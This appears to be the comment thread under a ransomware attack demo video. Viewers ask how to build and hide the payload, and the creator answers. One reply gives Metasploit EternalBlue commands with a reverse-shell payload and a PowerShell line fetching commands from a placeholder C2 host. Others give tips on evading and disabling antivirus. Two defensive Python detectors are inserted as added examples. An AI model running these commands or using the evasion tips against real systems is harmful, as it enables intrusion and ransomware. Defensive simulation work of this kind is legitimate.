Ransomware Attack Simulation

COMMENTS • 119

  • @MAG320
    @MAG320 1 year ago +28

    I would like to see how the ransomware was created (for ed purposes) so I can provide a debrief to a couple clients.

    • @UniqueMappingSequence
      @UniqueMappingSequence 7 months ago +17

      🤨🤨

    • @mohammadiaa
      @mohammadiaa 6 months ago +4

      Yeeees clients

    • @samajbhanproduction1520
      @samajbhanproduction1520 5 months ago

      IKIK

    • @lockardsecurity
      @lockardsecurity 4 months ago +4

      There are multiple parts of the attack; the first part, using the Word doc, was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

    • @shayloerakker21
      @shayloerakker21 22 days ago

      @lockardsecurity

  • @Shhukoihee
    @Shhukoihee 5 months ago +8

    Need more videos on the practical red team.
    You are explaining in the best way.
    I request you to make more videos to learn from you.

  • @marvinokapo3321
    @marvinokapo3321 1 year ago +14

    Hey mate, the Infection-Simulation document that you used to maintain the connection and to upload the malware to the victim machine, where did you get it from? (Educational purpose.) Thanks.

    • @lockardsecurity
      @lockardsecurity 4 months ago

      There are multiple parts of the attack; the first part, using the Word doc, was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

    • @MrRobot-yb8cb
      @MrRobot-yb8cb 4 months ago

      @lockardsecurity would be interesting to see the document part breakdown!

    • @alialazawi2849
      @alialazawi2849 4 months ago

      @lockardsecurity What about the environment? Can we use it please?

  • @alexbrasilia6459
    @alexbrasilia6459 1 year ago +7

    Do you have a paid course so we can learn step by step about this?

    • @lockardsecurity
      @lockardsecurity 4 months ago

      It's in the works; I should have more details to share in the coming weeks! Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @SamuraiJack1881
    @SamuraiJack1881 2 years ago +4

    Thank you for everything bro, have a good job.

  • @Blacksheep-ik7gx
    @Blacksheep-ik7gx 2 months ago

    Did this Office have macros set to auto-run? Usually you get an "enable content" message before running any type of VBS, or did you embed some shellcode in the .docx?

  • @CriAlch
    @CriAlch 2 months ago +1

    Hi Lockard,
    Sorry, I have a few questions since I don't quite understand how you got access to the device:
    - Did opening the Word document execute macros to gain access?
    - And does the user have local admin rights to execute them right away?
    - If it wasn't through macros, how did you get access from a different location/outside of the target network with the user only opening the Word document?
    How could this be prevented?

  • @FriedrichAugustHaselwander-k2z
    @FriedrichAugustHaselwander-k2z 1 month ago

    Hello, I am working on documentation about botnets and their threats to modern institutions as part of my apprenticeship. I was wondering if you could help me set this up as part of a practical showcase for my presentation.
    Kind regards,
    Leon

  • @sagisar
    @sagisar 7 months ago +3

    I would thank you if you could give a link to your research with all the commands you used for the persistence part, of course just for educational purposes.

    • @lockardsecurity
      @lockardsecurity 4 months ago

      I currently do not have them published publicly; that said, I'll be working on more content for the channel and will include more details and commands in the future. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @InternetVet
    @InternetVet 8 months ago +1

    Just drop all inbound connections on ports 5985 & 5986 to prevent this?

    • @lockardsecurity
      @lockardsecurity 4 months ago +1

      In this example, the attack is a reverse shell connection, meaning the victim's system is beaconing out to the Internet (egress). Not sure if you noticed or not, but the first connection was over TCP port 443 (HTTPS). Meaning if you drop all traffic outbound over 443, you may as well disconnect from the network because nothing will work. On the second connection, the outbound port was 53 (DNS). Another big issue if you try to block DNS on your network. No bind connection is being made, so I would hope and expect traffic is blocked inbound on those ports. Just know attackers (good ones) will leverage ports that MUST be open, like 53, 80, 443, to get their connections out of the network. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
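As an added example (not the channel's code) of the defensive angle in the reply above: rather than blocking 443 or 53, look in outbound connection logs for the regular cadence a reverse-shell beacon produces. The log format, hosts and timestamps are constructed sample data.

```python
"""Beacon detection over outbound connection records (added example).

A reverse shell that calls out over 443 or 53 cannot be stopped by closing
the port, but its reconnects tend to arrive on a near-fixed schedule, while
human-driven traffic does not. Score each (src, dst, port) flow by the
jitter of its inter-arrival times; low jitter over enough events is a beacon.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: "epoch_seconds src_ip dst_ip dst_port"
SAMPLE_LOG = """\
1700000000 10.0.0.5 203.0.113.7 443
1700000060 10.0.0.5 203.0.113.7 443
1700000121 10.0.0.5 203.0.113.7 443
1700000180 10.0.0.5 203.0.113.7 443
1700000241 10.0.0.5 203.0.113.7 443
1700000300 10.0.0.5 203.0.113.7 443
1700000005 10.0.0.5 198.51.100.9 443
1700000012 10.0.0.5 198.51.100.9 443
1700000190 10.0.0.5 198.51.100.9 443
1700000410 10.0.0.5 198.51.100.9 443
1700000900 10.0.0.5 198.51.100.9 443
1700000003 10.0.0.8 192.0.2.53 53
1700000033 10.0.0.8 192.0.2.53 53
1700000063 10.0.0.8 192.0.2.53 53
1700000093 10.0.0.8 192.0.2.53 53
"""


def parse_log(text):
    """Group connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        flows[(src, dst, int(port))].append(int(ts))
    return flows


def beacon_score(timestamps, min_events=4):
    """Return (mean_interval, jitter_ratio), or None when too few events.

    jitter_ratio = stddev / mean of the gaps between consecutive connections;
    a value near 0 means the host calls out on a fixed timer.
    """
    if len(timestamps) < min_events:
        return None
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    if avg == 0:
        return None
    return avg, pstdev(gaps) / avg


def find_beacons(text, max_jitter=0.15, min_events=4):
    """Flag flows whose egress cadence is suspiciously regular."""
    hits = []
    for (src, dst, port), stamps in parse_log(text).items():
        score = beacon_score(stamps, min_events)
        if score and score[1] <= max_jitter:
            hits.append({"src": src, "dst": dst, "port": port,
                         "interval_s": round(float(score[0]), 1),
                         "jitter": round(score[1], 3)})
    return sorted(hits, key=lambda h: (h["src"], h["port"]))


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

The 198.51.100.9 flow is ordinary bursty browsing and is not flagged; the two fixed-interval flows (60 s over 443, 30 s over 53) are.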

  • @magnese7993
    @magnese7993 8 months ago

    Which Kali tool did you use?

  • @zacharyaitken9478
    @zacharyaitken9478 2 months ago

    Is there any way you can show how to make the Word document and the actual ransomware script? As well as a list of the commands you used?

  • @rstitan4791
    @rstitan4791 3 months ago

    Could this be prevented by a hardware firewall?

  • @conan5890
    @conan5890 1 year ago +9

    Nice video, explanation and demonstration.
    I think you should try again against a computer that has a paid license of antivirus (e.g. ESET, etc.).
    The free version of Windows Defender has nothing to defend against any attack.

    • @detective5253
      @detective5253 1 year ago +2

      This is an interesting technique, and somehow similar to signed malware with a company's private signing key, typically used to backdoor whitelisted applications. Modern cyber sec is getting way more sophisticated than ever.

    • @Farfromfuture
      @Farfromfuture 1 year ago

      I was also looking for that type of video, bro 🥲

    • @lockardsecurity
      @lockardsecurity 4 months ago

      Thanks for the feedback. I use antiscan.me to test detections on the payloads; I also have the paid version of CrowdStrike that I test with as well. I'll add this to the list of videos to make. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @hack-talk9098
    @hack-talk9098 2 years ago +1

    Start with the full video so I learn how to create the payload and listener

    • @lockardsecurity
      @lockardsecurity 1 year ago

      I'll be creating an updated video with the full end-to-end process, which will show the latest and greatest processes and methods.

  • @zilverfox-wu1yd
    @zilverfox-wu1yd 1 year ago +1

    I assume you made a backdoor first; just how do you crypt it in Kali Linux, plus the exploit?

    • @lockardsecurity
      @lockardsecurity 1 year ago

      It's a broken macro technique; I recommend taking the OSEP training to learn more about this method. I avoid using crypters as they are easily flagged as suspicious.

    • @zilverfox-wu1yd
      @zilverfox-wu1yd 1 year ago

      @lockardsecurity okay, thanks lol

    • @kasinoFlow
      @kasinoFlow 1 year ago

      @lockardsecurity I want to learn more about hacking; can you make a Discord by any chance?

  • @matt-i3r6w
    @matt-i3r6w 2 months ago

    Can you make a video on how to protect from these types of attacks?

  • @sen7826
    @sen7826 5 months ago

    The whole process begins with opening a malicious file. Is it possible to identify the file as malicious with the default Windows Defender scan? If not, what else can a layman do to recognise which files are unsafe?

    • @lockardsecurity
      @lockardsecurity 4 months ago +1

      Great question, and unfortunately, as seen in this demo, Defender isn't able to detect an issue. Therefore you could do a few things:
      1. Scan for malware using trusted antivirus/anti-malware tools.
      2. Use VirusTotal for file analysis; www.virustotal.com is the site, Google owns them. Great way to get an idea as to what the majority of security vendors have to say about the file in question. Just know that everything uploaded to VirusTotal can be downloaded by anyone that requests it. Most folks are security researchers who work for security companies that make Anti-Virus / EDR products and use these uploads to help improve their detection logic. So the takeaway is, you don't want any classified data in a document ending up uploaded to VirusTotal. antiscan.me is a similar site and they don't submit uploads to 3rd parties like VirusTotal does.
      Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

    • @sen7826
      @sen7826 4 months ago

      @lockardsecurity Thank you for taking the time, this was very informative.

  • @Crypto_Dig
    @Crypto_Dig 7 months ago +4

    Can you make a tutorial on how to create such ransomware? (Love your content)

    • @Hogrider6.9
      @Hogrider6.9 7 months ago +1

      lol

    • @lockardsecurity
      @lockardsecurity 4 months ago

      I've kicked around a few ideas, and yes, there will be future videos to come on not just how to make them, but also how to evade detection from all the big-name security tools.

    • @Hogrider6.9
      @Hogrider6.9 4 months ago

      @lockardsecurity Guess we will wait.

  • @udohpele1696
    @udohpele1696 2 years ago +1

    Thanks for this demo. One question please: if the user is not a local admin and is unable to run the file after clicking, will the hack still be successful?

    • @lockardsecurity
      @lockardsecurity 1 year ago +1

      Hi, I'm sorry for the delayed response as I'm just now seeing your question. A non-admin user would still be able to open this file. In doing so the malicious code would still run, however it would be in the context of the user's permissions. When this happens, the attacker must do a privilege escalation attack to get admin / root access.

  • @jaydave4696
    @jaydave4696 1 year ago +1

    Hey! It's an absolutely amazing video... but how can I get this code... for my ransomware project? Can u reply pls.

  • @gho5t184
    @gho5t184 2 months ago

    Hello, I wanted to simulate the above attack for a college project; can anyone help me?

  • @paradownload2051
    @paradownload2051 1 year ago

    Sir, can I have a copy of that simulation? For educational purposes, I'm into cybersec right now.

  • @Gm-Rifat
    @Gm-Rifat 1 year ago

    What kind of mail are you using? How can I use it? Is it free?

  • @rafaelsandoval6472
    @rafaelsandoval6472 2 years ago

    Do you have a video where you put the malicious code into the macro file? Thank you.

    • @lockardsecurity
      @lockardsecurity 1 year ago +1

      Hi, I'm sorry for the delayed response as I'm just now seeing your question. No I do not; the main reason for that is so AV vendors don't pick up some of my methods. That said, this one already is being detected, which is expected over time. I'll consider creating more videos on the entire process, start to finish, along with diving deeper into the code and methods used.

  • @apitaremore9453
    @apitaremore9453 1 year ago +1

    How to remove ransomware??

    • @harshadsd90
      @harshadsd90 1 year ago

      Same question; tried all decryption methods but they don't work 😢😢

    • @HiChicken-zj7yc
      @HiChicken-zj7yc 1 year ago

      Cause u can't; only the one who puts it in the system can, which u gonna need to pay for.

  • @sadnanjuhib
    @sadnanjuhib 3 months ago +1

    I love this video ❤

  • @alialazawi2849
    @alialazawi2849 4 months ago +1

    I love the video!!

    • @lockardsecurity
      @lockardsecurity 4 months ago

      Thanks for watching, please like, share and subscribe as we'll be releasing more videos like this in the near future!

  • @shadowsalah1484
    @shadowsalah1484 9 months ago

    Hey guys, hackers control ransom with a C&C server?

  • @BlueZackMuthey
    @BlueZackMuthey 1 year ago

    How did you get access to the target's computer?

    • @KnightMagnet
      @KnightMagnet 1 year ago

      The link the victim clicked gave away the IP address, and with the IP, the hacker can basically access the victim.

    • @TK-od8hd
      @TK-od8hd 1 year ago

      @KnightMagnet so a firewall rule will block this connection?

    • @issho8885
      @issho8885 1 year ago +1

      @TK-od8hd Only if the attacker IP was known beforehand and it was put in the rule.

    • @lockardsecurity
      @lockardsecurity 4 months ago

      It becomes a whack-a-mole game at that point. We recommend ingesting threat intel on what are called IoCs (Indicators of Compromise), with which you can block known bad sources and destinations. However, advanced malware can be set up to talk to not just IPs but URLs, for which an attacker can easily change DNS records on the fly. They can also have multiple IPs and URLs to call out to, which makes blocking it on the firewall near impossible in some cases.

  • @littleghoost
    @littleghoost 1 year ago

    How to disable antivirus before infecting?

    • @lockardsecurity
      @lockardsecurity 4 months ago

      Each AV has its own steps to follow; most are controlled via the Registry or the running process memory space.

    • @littleghoost
      @littleghoost 4 months ago

      @lockardsecurity Ok. Windows Defender for example, can it be disabled through the malware itself?

  • @rersheed
    @rersheed 1 year ago

    Hi! I have been trying to simulate ransomware traffic for testing a countermeasure but I couldn't. How can I simulate WannaCry ransomware traffic?
    Best Regards

    • @lockardsecurity
      @lockardsecurity 4 months ago

      Each ransomware is slightly different, but also slightly similar. Great question, and I wish I could have responded sooner. I'll create a video on this topic as well. In the meantime, for WannaCry, do the following:
      Tools and Steps for Simulation:
      1. Set Up a Controlled Environment:
      * Use a virtual lab with several Windows machines.
      * Ensure the environment is completely isolated from any production networks.
      2. Simulate Infection Traffic:
      * Metasploit Framework: Use Metasploit to simulate the EternalBlue exploit used by WannaCry.
      Load Metasploit with the EternalBlue module (bash):
          msfconsole
          use exploit/windows/smb/ms17_010_eternalblue
          set RHOST
          set PAYLOAD windows/x64/meterpreter/reverse_tcp
          set LHOST
          exploit
      * Emulate Ransomware Activity: Create custom scripts to simulate typical ransomware behavior without actually encrypting files.
      * Create a script to mimic the creation of ransom notes, registry modifications, and dummy file encryption (rename files instead of encrypting).
      * Generate network traffic to simulate command and control (C2) communication (PowerShell; the URL needs a scheme for DownloadString to accept it):
          $WebClient = New-Object System.Net.WebClient
          $WebClient.DownloadString("http://your-c2-server.com/command")
      3. Monitor and Analyze Traffic:
      * Use network monitoring tools like Wireshark to capture and analyze the simulated traffic.
      * Verify the detection of IOCs with your security tools (SIEM, IDS/IPS).
      4. Deploy Detection and Prevention Measures:
      * Implement rules in your security tools to detect the IOCs listed above.
      * Test the effectiveness of your security measures in detecting and responding to the simulated ransomware activity.
      Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.
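As an added example (not the channel's code) for steps 2 and 4 of the reply above: a detection rule for the simulated behaviour, one process renaming many files to a single new extension in a burst plus a ransom-note file being written, run over constructed file-event records. The event format, the `.wncry` extension and the note filenames are assumptions made for the sample.

```python
"""Detection check for simulated ransomware activity (added example).

Flags (a) one process renaming many files to the same new extension within
a short window and (b) creation of a ransom-note-style file. The event
format, paths, extension and note names are constructed, not from the video.
"""
from collections import defaultdict
import os

# Assumption: note filenames the rule should recognise (lower-case).
RANSOM_NOTE_NAMES = {"readme.txt", "decrypt_instructions.txt", "how_to_recover.txt"}

# Constructed sample events: "epoch ACTION pid path [-> new_path]"
SAMPLE_EVENTS = """\
1700000000 RENAME 4120 C:\\Users\\a\\Docs\\q1.xlsx -> C:\\Users\\a\\Docs\\q1.xlsx.wncry
1700000001 RENAME 4120 C:\\Users\\a\\Docs\\q2.xlsx -> C:\\Users\\a\\Docs\\q2.xlsx.wncry
1700000001 RENAME 4120 C:\\Users\\a\\Docs\\plan.docx -> C:\\Users\\a\\Docs\\plan.docx.wncry
1700000002 RENAME 4120 C:\\Users\\a\\Docs\\notes.txt -> C:\\Users\\a\\Docs\\notes.txt.wncry
1700000002 RENAME 4120 C:\\Users\\a\\Pics\\cat.jpg -> C:\\Users\\a\\Pics\\cat.jpg.wncry
1700000003 CREATE 4120 C:\\Users\\a\\Docs\\DECRYPT_INSTRUCTIONS.txt
1700000050 RENAME 2210 C:\\Users\\b\\draft.docx -> C:\\Users\\b\\final.docx
1700000300 RENAME 2210 C:\\Users\\b\\old.log -> C:\\Users\\b\\old.log.bak
"""


def parse_events(text):
    """Turn the sample lines into dicts; new_path is None for non-renames."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, action, pid, rest = line.split(" ", 3)
        src, _, dst = rest.partition(" -> ")
        events.append({"ts": int(ts), "action": action, "pid": int(pid),
                       "path": src, "new_path": dst or None})
    return events


def _ext(path):
    return os.path.splitext(path)[1].lower()


def _basename(path):
    # Sample uses Windows paths; accept either separator.
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def detect(text, window_s=60, threshold=4):
    """Return alert dicts for ransom-note creation and mass extension renames."""
    alerts = []
    renames = defaultdict(list)  # pid -> [(ts, new_ext)]
    for ev in parse_events(text):
        if ev["action"] == "CREATE" and _basename(ev["path"]).lower() in RANSOM_NOTE_NAMES:
            alerts.append({"rule": "ransom_note", "pid": ev["pid"], "path": ev["path"]})
        elif ev["action"] == "RENAME" and _ext(ev["new_path"]) != _ext(ev["path"]):
            renames[ev["pid"]].append((ev["ts"], _ext(ev["new_path"])))
    for pid, items in renames.items():
        items.sort()
        # Sliding window: renames to one new extension within window_s seconds.
        for i, (t0, ext) in enumerate(items):
            n = sum(1 for t, e in items[i:] if t - t0 <= window_s and e == ext)
            if n >= threshold:
                alerts.append({"rule": "mass_rename", "pid": pid, "ext": ext, "count": n})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The ordinary renames by pid 2210 (same extension, or a single .bak) stay below the threshold, so only the simulated process fires both rules.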

  • @meowtrox1234
    @meowtrox1234 1 year ago

    How about if you have a dynamic IP address? Will ransomware be possible?

    • @sunrevolver
      @sunrevolver 4 months ago +1

      Yes

    • @lockardsecurity
      @lockardsecurity 4 months ago +2

      Yes, in this case, the ransomware will act more like a worm, scan the entire network and attempt to spread to all hosts that appear to be up.

  • @SSN5-R
    @SSN5-R 1 year ago +1

    It's Kali Linux

  • @ronwurdesagendasises9249
    @ronwurdesagendasises9249 2 years ago

    How do you make this Word document without macros?

    • @lockardsecurity
      @lockardsecurity 1 year ago +1

      It's a broken macro technique. I recommend taking the OSEP training to learn more about this method.

  • @Dr.Yuzerssif
    @Dr.Yuzerssif 1 year ago

    Thank you for this video. I need your help. My laptop was exposed to a JAWR ransomware attack. I see that you are an expert in this field. I hope you can help me solve this complex problem. Thank you very much in advance.

    • @lockardsecurity
      @lockardsecurity 4 months ago

      Sorry for the delay, I'm just now seeing your comment. I hope you were able to recover from that attack. Moving forward, I'll keep a closer eye on this channel as we start to create new content.

  • @sreerahul6663
    @sreerahul6663 1 year ago

    Hi bro
    If a PC is infected with a ransomware virus, how to decrypt it? Please do a video.

  • @fwiii1831
    @fwiii1831 2 years ago

    How did you make it without WinDef or AV noticing or alarming? Can u tell me in 1-2 sentences how this exploit works and what I need to do? (educational purposes only)

    • @zilverfox-wu1yd
      @zilverfox-wu1yd 1 year ago +1

      crypter

    • @lockardsecurity
      @lockardsecurity 1 year ago +3

      Hi, I'm sorry for the delayed response as I'm just now seeing your question. It requires creating the payload in a way that is unique, without any suspicious indicators that would get flagged. Most crypters are easily detectable as suspicious. It requires a lot of testing, trial and error. For example, the methods I used here no longer work, therefore you have to always continue to evolve the payloads to stay one step ahead of the detection engines.

  • @Ammar_Imam
    @Ammar_Imam 1 month ago

    Great and informative video! I’m a cybersecurity student, and I’d love to see how you disguised this malware script as a Word document without detection. For a university project (for learning purposes), I created a Trojan that establishes a reverse shell connection between the victim and the attacker, but I couldn’t embed it in a legitimate process.

  • @gernot4490
    @gernot4490 1 year ago

    Does Kaspersky allow opening the infected Word doc in the beginning of the vid? I don't think so, so it's preventing the ransomware attack?

    • @jacvbtaylor
      @jacvbtaylor 8 months ago

      That probably all depends on the exploit in the doc

    • @lockardsecurity
      @lockardsecurity 4 months ago

      This doc at the time was what's known as FUD, meaning fully undetectable. However, now just about all vendors flag it. That said, I'll be recreating this video in the near future and will be showing it against all the major AV / EDR vendors.

  • @styxnet._
    @styxnet._ 5 months ago +1

    bro this is so good

    • @lockardsecurity
      @lockardsecurity 4 months ago +1

      Thanks! Glad you enjoyed it, we'll be stepping up our response and content creation on this channel. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @SteveRoufosse
    @SteveRoufosse 11 months ago +2

    I bet nobody could send me ransomware 😂

  • @electragammingtech9801
    @electragammingtech9801 2 years ago

    Give me the Google Sheets documents.

  • @a6eu
    @a6eu 1 year ago

    Hello Lord, I have a final project tomorrow, and I need to demonstrate this attack to get bonus points; I really need this. Can you help me, plsss?!!

    • @lockardsecurity
      @lockardsecurity 1 year ago

      Dang, I'm just now seeing this comment! Hope you were able to demonstrate this for your class.

    • @thewickedmma
      @thewickedmma 11 months ago

      Broo help me out, I'm going through the same thing.

    • @abdullahiridwan-wj3pt
      @abdullahiridwan-wj3pt 1 month ago

      @thewickedmma hello bro, can I get your attention?

  • @robertclark2607
    @robertclark2607 2 years ago

    Who would use Windows ge

  • @networksolucoes7537
    @networksolucoes7537 9 months ago

    Very good presentation!!

  • @Ghuffran11
    @Ghuffran11 1 month ago

    This PC did not have any antivirus… if there is a corporate antivirus, would this be avoided???

  • @itsmattg_shorts
    @itsmattg_shorts 1 year ago +1

    So you don’t go to jail y’all, hack a vm lol

    • @lockardsecurity
      @lockardsecurity 4 months ago

      To be clear, it's my VM, and you can hack your own stuff, providing you give yourself permission to do so lol!

  • @dainanaikenraiko2952
    @dainanaikenraiko2952 1 month ago

    Daamn this is so evil

  • @TECHANDFUN07
    @TECHANDFUN07 1 month ago

    Hey there, how can I get this virus??

  • @thedarkside-t4s
    @thedarkside-t4s 1 month ago

    How do you make this undetectable payload?

  • @danwolf1168
    @danwolf1168 1 year ago +2

    Instead of “hacker” you should say cyber criminal.

    • @saji002
      @saji002 1 year ago

      Generally it's hacker.

    • @lockardsecurity
      @lockardsecurity 4 months ago

      True, bad actor is also on the list. But to be honest, when I created this video I honestly thought it was going to be geared more toward NON-security folks! How wrong was I, lol. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @mohamedamjath3884
    @mohamedamjath3884 1 year ago +1

    Hi, can I contact you pls?

    • @lockardsecurity
      @lockardsecurity 4 months ago

      Yes, you can reach out to www.lockardsecurity.com
      Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @crestheproducer
    @crestheproducer 2 months ago

    @proteckdiamond solved the ransomware problem for the first time in l.G

  • @Can-d4i
    @Can-d4i 1 month ago

    How can I get ransomware tools? My friend is asking, for educational purposes...